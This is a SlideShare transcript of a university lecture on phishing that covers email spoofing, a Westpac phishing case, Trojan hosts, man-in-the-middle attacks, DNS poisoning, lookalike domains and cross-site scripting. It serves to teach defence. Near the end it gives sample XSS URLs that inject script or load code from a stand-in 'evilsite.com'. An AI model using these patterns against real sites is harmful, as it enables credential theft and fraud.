• Like
  • Save
L1  phishing
Upcoming SlideShare
Loading in...5
×
 

L1 phishing

on

  • 303 views

 

Statistics

Views

Total Views
303
Views on SlideShare
303
Embed Views
0

Actions

Likes
1
Downloads
27
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    L1  phishing L1 phishing Presentation Transcript

    • PhishingPhishing 1Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh
    • About me  Currently, Lecturer in this department for 351 days   Former Research Intern in M3C Laboratory, University of Bolton, UK Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 2
    • For you  Email me at rushdecoder@yahoo.com if you want  My homepage and course materials are at http://rushdishams.googlepages.com  You need to join http://groups.google.com/group/csebatche sofrushdi Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 3
    • Phishing  The number of unique e-mail-based fraud attacks detected in November 2005 was 16,882, almost double the 8,975 attacks launched in November 2004, said the report (Anti-Phishing Working Group)  Phishing e-mails pretend to come from legitimate companies, such as banks and e- commerce sites  Used by criminals to try and trick Web users into revealing personal information and account detailsRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 4
    • Phishing  The number of brands targeted increased by nearly 50 percent over the course of 2005, from 64 percent to 93 percent in November 2006  "One big attack will temporarily hurt a brand, but the increase in e-commerce is not slowing down," (Mark Murtagh, Websense technical director) Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 5
    • Phishing  Top brands continue to be hijacked, with phishers using established names to try to lure people to their sites  eBay is often spoofed, for obvious reasons  Google is increasingly being targeted because of its expansion into different business application models.  The big banking names are used too--HSBC, Citigroup, Lloyds--all the major brands Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 6
    • Phishing  There's no point in using local names if the attack is global  Attacks are becoming increasingly sophisticated  Web sites are hosting keylogging malicious software  Before, people had to click on a site to download malicious code.  If they thought a web site 'phishy,' they could leave and probably not be harmed.  Now. with most phishing sites they just have to Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 7
    • Phishing  Twenty-five percent of those sites now host keylogging code  If you visit one you will probably open yourself to identity theft or fraud Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 8
    • Exploiting the Weakness  Why is it that Crooks are able to mount an attack?  What are the weaknesses that they exploit?  Richness of functionality Complex systems can have program bugs  Increasing interconnectivity Separate functions of any system are combined and interconnected via Internet Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 9
    • Exploiting the Weakness  Expanding market in exploits Very few people requires as the technical gadgets are impressive and cheap  The scale of content based attacks Everyone uses e-mails and e-mails are exploitable. Then why not? Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 10
    • Social Engineering Factors  Phishing attacks rely upon a mix of technical deceit and social engineering practices.  In the majority of cases the Phisher must persuade the victim  The victim intentionally performs a series of actions that will provide access to confidential information Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 11
    • Social Engineering Factors  Communication channels such as email, web-pages, IRC and instant messaging services are popular.  Phisher must impersonate a trusted source (e.g. the helpdesk of their bank, automated support response from their favourite online retailer, etc.) for the victim to believe. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 12
    • Social Engineering Factors Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 13
    • Phishing Techniques  Phishing attacks initiated by email are the most common.  Using Trojan Network, Phishers can deliver specially crafted emails to millions of legitimate “live” email addresses within a few hours  Sometimes phishers purchase e-mail address Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 14
    • Phishing Techniques  Utilising well known flaws in the common mail server communication protocol (SMTP), Phishers are able to create emails with fake “Mail From:” headers and impersonate any organisation they choose.  Any customer replies to the phishing email will be sent to them. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 15
    • Phishing Techniques  Official looking and sounding emails  Copies of legitimate corporate emails with minor URL changes  HTML based email used to obfuscate target URL information  Standard virus/worm attachments to emails Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 16
    • Phishing Techniques  A plethora of anti spam-detection inclusions  Crafting of “personalised” or unique email messages  Fake postings to popular message boards and mailing lists  Use of fake “Mail From:” addresses and open mail relays for disguising the source of the email Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 17
    • A real-life phishing example Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 18
    • Things to note  The email was sent in HTML format  Lower-case L’s have been replaced with upper-case I’s. This is used to help bypass many standard anti-spam filters Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 19
    • Things to note  Within the HTML-based email, the URL link https://oIb.westpac.com.au/ib/defauIt.asp in fact points to a escape-encoded version of the following URL: http://olb.westpac.com.au.userdll.com:4903/ib/index. htm Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 20
    • Things to note Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 21
    • Things to note  The non-standard HTTP port of 4903 can be attributed to the fact that the Phishers fake site was hosted on a third-party PC that had been previously compromised by an attacker Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 22
    • Things to note  Recipients that clicked on the link were then forwarded to the real Westpac application.  However a JavaScript popup window containing a fake login page was presentedRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 23
    • Things to note  This fake login window was designed to capture and store the recipient’s authentication credentials  JavaScript also submitted the authentication information to the real Westpac application Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 24
    • Where are they standing now?  The inclusion of HTML disguised links  The use of third-party supplied, or fake, banner advertising graphics to lure customers  The use of web-bugs (hidden items within the page – such as a zero-sized graphic) to track a potential customer  The use of pop-up or frameless windows to disguise the true source of the Phishers message. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 25
    • Where are they standing now?  Embedding malicious content within the viewable web-page  installs software of the Phishers choice (e.g. key-loggers, screen-grabbers, back-doors and other Trojan horse programs). Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 26
    • Banner Advertising Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 27
    • IRC and IM  New on the Phishers radar, IRC and Instant Messaging (IM) forums are likely to become a popular phishing ground.  The common usage of Bots (automated programs that listen and participate in group discussions) in many of the popular channels, Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 28
    • Trojan Hosts  the delivery source is increasingly becoming home PC’s that have been previously compromised.  Trojan horse program has been installed which allows Phishers (along with Spammers, Warez Pirates, DDoS Bots, etc.) to use the PC as a message propagator.  tracking back a Phishing attack to an individual initiating criminal is extremely difficult. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 29
    • Trojan Hosts  the installation of Trojan horse software is on the increase, despite the efforts of large anti-virus companies.  operate large networks of Trojan deployments (networks consisting of thousands of hosts are not uncommon)  Phishers must be selective about the information they wish to record or be faced with information overload. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 30
    • Information Specific Trojans  You have come across a file named JavaUtil.zip.  But you forgot that you have “do not show known file extensions” in your Windows setting.  Hmm, then JavaUtil.zip originally maybe a .exe file whose full name is JavaUtil.zip.exe  You, unfortunately, click that zip file to unzip it.  You are doomed!  Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 31
    • Information Specific Trojans  Early in 2004, a Phisher created a custom key-logger Trojan.  The Trojan key-logger was designed specifically to capture all key presses within windows with the titles of various names including:- commbank, Commonwealth, NetBank, Citibank, Bank of America, e-gold, e-bullion, e-Bullion, evocash, EVOCash, EVOcash, intgold, INTGold, paypal, PayPal, bankwest, Bank West, BankWest, National Internet Banking, cibc, CIBC, scotiabank and ScotiaBank Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 32
    • Phishing Attack Vectors  Man-in-the-middle Attacks  URL Obfuscation Attacks  Cross-site Scripting Attacks  Preset Session Attacks Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 33
    • Man in the Middle Attacks  the attacker situates themselves between the customer and the real web-based application, and proxies all communications between the systems.  This form of attack is successful for both HTTP and HTTPS communications.  The customer connects to the attackers server as if it was the real site  The attackers server makes a simultaneous connection to the real site. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 34
    • Man in the Middle Attacks  The attackers server then proxies all communications between the customer and the real web-based application server  In the case of secure HTTPS communications, an SSL connection is established between the customer and the attackers proxy  while the attackers proxy creates its own SSL connection between itself and the real server. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 35
    • Man in the Middle Attacks Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 36
    • Man in the Middle Attacks  The attacker must be able to direct the customer to their proxy server instead of the real server.  This may be carried out through a number of methods:  Transparent Proxies  DNS Cache Poisoning  URL Obfuscation Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 37
    • Transparent Proxies  Situated on the same network segment or located on route to the real server  a transparent proxy service can intercept all data by forcing all outbound HTTP and HTTPS traffic through itself. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 38
    • DNS Cache Poisoning  be used to disrupt normal traffic routing by injecting false IP addresses for key domain names.  the attacker poisons the DNS cache of a network firewall so that all traffic destined for the MyBank IP address now resolves to the attackers proxy server IP address Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 39
    • URL Obfuscation  the attacker tricks the customer into connecting to their proxy server instead of the real server.  the customer may follow a link to http://privatebanking.mybank.com.ch http://mybank.privatebanking.com http://privatebanking.mybonk.com http://privatebanking.mybánk.com http://privatebanking.mybank.hackproof.com  And the real one is http://privatebanking.mybank.com Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 40
    • Third party shortened URL Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 41
    • Cross Site Scripting (XSS)  make use of custom URL or code injection into a valid web-based application URL  the result of poor web-application development processes. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 42
    • Cross Site Scripting (XSS)  Full HTML substitution such as: http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm  Inline embedding of scripting content, such as: http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode  Forcing the page to load external scripting code, such as: http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2 Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 43
    • Cross Site Scripting (XSS) Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 44
    • Preset Session Attack Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 45
    • Hidden Frame Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 46
    • Graphical Substitution Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 47
    • References  The Phishing Guide by Next Generation Security Software Software Limited. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 48
    • Related Papers  Technical Trends in Phishing Attacks by Jason Milletary  Why Phishing Works by Dhamija et al. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 49